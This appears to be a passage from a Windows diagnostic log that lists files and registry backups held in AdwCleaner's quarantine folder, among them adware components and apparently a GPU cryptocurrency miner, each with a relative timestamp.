         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.6s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          1.0s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.0s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.0s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.0s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.1s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.1s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.1s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.2s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.2s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.2s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.2s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.3s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.3s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.3s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.3s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.4s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.4s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.4s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.4s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.5s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.5s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.5s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.5s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.5s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.6s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.8s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
